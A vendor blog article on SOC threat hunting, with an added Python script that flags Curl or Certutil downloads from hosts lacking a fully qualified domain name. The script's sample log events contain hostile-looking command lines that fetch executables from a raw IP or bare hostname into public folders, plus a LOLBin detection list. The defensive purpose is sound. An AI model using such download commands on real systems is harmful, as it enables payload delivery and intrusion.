In a previous article, we covered threat intelligence: the collection and analysis of data to understand the threat actors that pose cybersecurity risks to your organization. On an operational level, this involves detecting threats by matching Indicators of Compromise (IoCs) and Tactics, Techniques, and Procedures (TTPs) with data sourced from SIEM (Security Information and Event Management) platforms and XDR products.
Configuring a fully automated system that strikes a fine balance between detection rate and false positives is a formidable challenge. For instance, it’s well known that certain malware is downloaded and installed on workstations using trusted, pre-installed system tools (so-called LOLBins, or Living Off The Land Binaries) such as Curl or Certutil. However, given that these tools have many legitimate uses, such as in update mechanisms, detecting every download made with them and flagging it for scrutiny by our SOC analysts would overload them with false positives.
That’s why, on a tactical level, the Cegeka Modern SOC also performs recurring threat hunting. A senior CSIRT analyst then manually examines relevant, advanced and/or novel TTPs to uncover hidden attacks. So, how does this process work at Cegeka?
Our CSIRT analysts closely follow cybersecurity trends and understand their clients’ risk profiles, including the relevant threat actors they may face. Threat modeling, the process of identifying potential attackers, their goals, and the techniques they might use to compromise systems, helps analysts prioritize which threats to focus on. For example, an analyst might notice a trend involving the use of LOLBins like Curl to download malware, or the rise of Eastern European ransomware groups. This modeling informs the hypotheses they explore during threat hunting.
Drawing on this threat intelligence, the CSIRT analyst formulates several hypotheses, such as “Eastern European ransomware groups may be downloading attacker tools onto compromised machines using LOLBins.” This hypothesis is then translated into specific threat hunts, such as “The use of Curl for downloading from servers without a fully qualified domain name.”
Each hunt is then converted into precise hunting queries for EDR (Endpoint Detection and Response), XDR (Extended Detection and Response), and SIEM (Security Information and Event Management) products. These queries are executed across the systems of all our clients. We also run queries on network monitoring tools, for instance, in relation to data transfers to servers without a fully qualified domain name.
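To make the hunt from the previous paragraph concrete, here is an added illustration (not Cegeka’s own query or tooling) that runs the “Curl or Certutil downloading from a server without a fully qualified domain name” hunt over a handful of constructed process-creation events; the pipe-delimited log format, the field names and the LOLBin list are assumptions, and a real hunt would express the same logic as an EDR/XDR/SIEM query.

```python
import re
import ipaddress
from urllib.parse import urlparse

# Constructed sample process-creation events (not real client data).
# Fields: timestamp | endpoint | user | command line
SAMPLE_EVENTS = [
    "2024-05-01T08:00:01Z|WS-0142|alice|curl -sSL https://updates.example.com/agent.msi -o agent.msi",
    "2024-05-01T08:03:17Z|WS-0142|alice|curl http://10.0.5.23:8080/p.exe -o C:\\Users\\Public\\p.exe",
    "2024-05-01T08:04:02Z|SRV-DB01|svc_backup|certutil -urlcache -split -f http://builds/tool.zip tool.zip",
    "2024-05-01T08:05:44Z|WS-0099|bob|notepad.exe report.txt",
    "2024-05-01T08:06:10Z|WS-0099|bob|curl -O ftp://files.corp.example.net/pub/readme.txt",
]

# Assumed list of download-capable LOLBins in scope for this hunt.
LOLBINS = ("curl", "curl.exe", "certutil", "certutil.exe")
URL_RE = re.compile(r"\b[a-z][a-z0-9+.-]*://[^\s\"']+", re.IGNORECASE)


def host_is_fqdn(host: str) -> bool:
    """True only for a dotted DNS name; IP literals and bare hostnames are not FQDNs."""
    try:
        ipaddress.ip_address(host)
        return False  # raw IPv4/IPv6 address, not a domain name at all
    except ValueError:
        pass
    return "." in host.strip(".")


def hunt_lolbin_downloads(events):
    """Return one hit per download by a LOLBin whose target host lacks an FQDN."""
    hits = []
    for line in events:
        ts, endpoint, user, cmdline = line.split("|", 3)
        # Image name without any leading Windows path component.
        exe = cmdline.split()[0].lower().rsplit("\\", 1)[-1]
        if exe not in LOLBINS:
            continue
        for url in URL_RE.findall(cmdline):
            target = urlparse(url).hostname or ""  # port stripped, host kept
            if not host_is_fqdn(target):
                hits.append({"timestamp": ts, "endpoint": endpoint, "user": user,
                             "target": target, "cmdline": cmdline})
    return hits


if __name__ == "__main__":
    for hit in hunt_lolbin_downloads(SAMPLE_EVENTS):
        print(f"[HUNT HIT] {hit['timestamp']} {hit['endpoint']} {hit['user']} -> {hit['target']}: {hit['cmdline']}")
```

Only the two downloads from a raw IP and from a bare hostname surface for analyst review; the update from a fully qualified domain is left alone, which is exactly the noise reduction that makes this hunt workable where a blanket “any Curl download” rule is not.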
Every hunt leads to one of three scenarios: we uncover something suspicious, we lack sufficient data, or we find no noteworthy results.
The results of our hunts provide insights that we compile into a report for our clients:
Our SOC clients can also access these insights via the Cegeka Security Observability dashboard. This allows them to assess their risks and make informed decisions to improve their security posture based on concrete data from our threat hunts. For example, if our reports indicate they lack certain data sources, they may choose to invest in deploying these data sources to get the full benefit of our threat hunts.
By actively performing threat hunting and combining it with threat intelligence, newsletters, and ongoing threat research, organizations gain the insights needed to uncover hidden attacks and respond effectively to the latest cyber threats. It is this proactive approach that helps organizations stay one step ahead in an ever-evolving threat landscape.
Threat Hunting is part of our Cegeka Modern SOC services by default. On the one hand, it allows us to detect advanced techniques for which continuous monitoring rules would overload SOC analysts with false positives; on the other hand, it is truly a compensating control for attacks that are so novel or advanced that they might have slipped through the meshes of the net.